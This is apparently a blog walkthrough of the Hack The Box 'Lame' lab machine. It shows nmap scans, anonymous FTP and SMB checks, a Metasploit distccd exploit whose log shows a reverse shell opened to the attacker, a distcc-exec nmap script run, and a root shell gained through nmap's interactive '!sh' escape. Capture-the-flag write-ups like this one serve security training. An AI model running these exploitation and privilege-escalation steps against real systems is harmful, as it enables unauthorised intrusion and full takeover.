Redhalo

Hack the Box Walkthrough – LAME machine

New walkthrough today about the easy machine LAME from Hack The Box. Probably one of the easiest machine in HTB when we look at the own numbers.

Let’s jump in !

ENUMERATION

As usual we start with an nmap enumeration to see what we are dealing with.

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.55.194 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 03:42 EST
Nmap scan report for 10.129.55.194
Host is up (0.026s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h32m53s, deviation: 3h32m10s, median: 2m51s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr                                                                                                                                                                                                               
|_  System time: 2020-11-28T03:47:43-05:00                                                                                                                                                                                                 
| smb-security-mode:                                                                                                                                                                                                                       
|   account_used: guest                                                                                                                                                                                                                    
|   authentication_level: user                                                                                                                                                                                                             
|   challenge_response: supported                                                                                                                                                                                                          
|_  message_signing: disabled (dangerous, but default)                                                                                                                                                                                     
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.65 seconds

We see the FTP port open which allows anonymous connection – let’s have a look:

[email protected]:~/Documents$ ftp 10.129.55.194
Connected to 10.129.55.194.
220 (vsFTPd 2.3.4)
Name (10.129.55.194:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

Nothing insterresting..

We have as well a samba SMB running – let’s have a quick look:

[email protected]:~/Documents$ smbclient -L 10.129.55.194
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

mmk ok.. protocol negotiation failed.

A look on Google gave the solution: edit the file /etc/samba/smb.conf and add the following under the global section:

client min protocol = NT1

let’s try again:

[email protected]:~/Documents$ smbclient -L 10.129.55.194
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

Maybe something interresting in the shared tmp folder:

[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 28 04:01:12 2020
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix                          DH        0  Sat Nov 28 03:41:15 2020
  vmware-root                        DR        0  Sat Nov 28 03:41:38 2020
  .X11-unix                          DH        0  Sat Nov 28 03:41:42 2020
  .X0-lock                           HR       11  Sat Nov 28 03:41:42 2020
  5581.jsvc_up                        R        0  Sat Nov 28 03:42:29 2020
  vgauthsvclog.txt.0                  R     1600  Sat Nov 28 03:41:13 2020

                7282168 blocks of size 1024. 5385868 blocks available

Nope.. the shared opt folder ?

[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/opt
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

Nope..

Ok then we have a port 3632 opens for distcc

From wikipedia, we know that distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network.

A search with searchsploit give a nice result:

let’s give a try

FOOTHOLD

There are only two options to set:

I have then added a payload and configure it

time now to run our exploit :

msf6 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.106:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mm0VQUXWQUFfriyg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.106:4444 -> 10.129.31.153:38737) at 2020-11-28 08:35:44 -0500

And we have a shell !

PRIVILEGE ESCALATION

By running a linpeas report I found out that nmap is installed and may help for our priv esc

Indeed, the nmap interactive mode can be used to execute shell command

[email protected]:/tmp$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami 
whoami
root

And we are root !

other ways to do

I read here that we could use nmap to our foothold shell.

[email protected]:~$ sudo wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
[sudo] password for kali: 
--2020-11-28 09:01:51--  https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 45.33.49.119, 2600:3c01:e000:3e6::6d4e:7061
Connecting to svn.nmap.org (svn.nmap.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’

/usr/share/nmap/scripts/distcc-exec.nse                    100%[=======================================================================================================================================>]   3.44K  --.-KB/s    in 0s      

2020-11-28 09:01:52 (128 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]

then run the following command:

[email protected]:~$ nmap -p 3632 10.129.31.153 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 09:03 EST
Nmap scan report for 10.129.31.153
Host is up (0.025s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://distcc.github.io/security.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Then reading the HTB official write up there was a easier way to do.

They used the metasploit exploit exploit/multi/samba/usermap_script and got root directly